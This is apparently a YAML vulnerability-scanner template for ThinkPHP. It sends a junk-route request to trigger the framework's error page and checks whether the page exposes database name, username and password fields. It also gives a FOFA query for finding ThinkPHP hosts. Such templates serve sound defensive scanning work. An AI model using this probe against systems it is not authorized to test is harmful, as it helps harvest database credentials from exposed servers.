product: ThinkPHP
vName: ThinkPHP Errors - Sensitive Information Exposure
type: 信息泄漏
vID: [ ]
level: 2
vDesc: ThinkPHP error is leaking sensitive info.
version: ''
note: ''
search:
  FOFA: app="ThinkPHP"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /index.php?s=fadfasfdas
    verify:
      logic: and
      check:
        - body:
            value:
              - _DATABASE</td>
              - _USERNAME</td>
              - _PASSWORD</td>
            logic: and
        - body:
            value:
              - <title>系统发生错误</title>
              - <title>System Error</title>
            logic: or
        - body:
            value:
              - Exception
              - REQUEST_TIME
            logic: and
        - status: 200